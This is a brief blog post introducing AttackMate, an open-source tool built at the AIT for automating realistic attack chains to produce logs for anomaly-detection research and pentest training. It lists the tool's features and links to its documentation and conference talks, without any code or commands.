Automating attack chains is not only necessary for testing cybersecurity mechanisms, but also very practical for cybersecurity training and pentests. Most existing tools are not primarily concerned with the attacks manifesting themselves in the logs as if they had been carried out by a human attacker. AttackMate was written with the intention of performing realistic attacks and allows attacks to be chained across all phases of the killchain. I wrote that tool as part of my work at the AIT, where we need realistic logs for anomaly detection. It is Free Open Source Software and available on GitHub
Features
The primary features of AttackMate are:
- Portable playbooks
- Reproducible attack chains
- Developerfriendly
- Uses well known exploits
- Real malware(Sliver)
- Usable for every phase of the killchain
- Full support for Metasploit
- Separate parts of playbooks with include-command
- Unix-Philosophy: Use output of command for input of other command
- Logging(including metadata)
- Commands in backgroundmode
- Support for interactive commands
- SSH/SCP
- Shell Command
- ..and many more
Getting Started
The Documentation of AttackMate explains how to install and prepare AttackMate and also includes some Example Playbooks that can be used against the Metasploitable2 VM.
Talks about AttackMate
I gave talks about AttackMate at the BalCCon2k24 and IT-S Now conferences. Feel free to watch for deeper understanding what AttackMate is:
BalcCon2k24
IT-S Now
Further Information
In this blog post I just introduced AttackMate and gave an overview of its features. For more detailed information I would recommend to check out the GitHub repository and the Documentation of AttackMate.
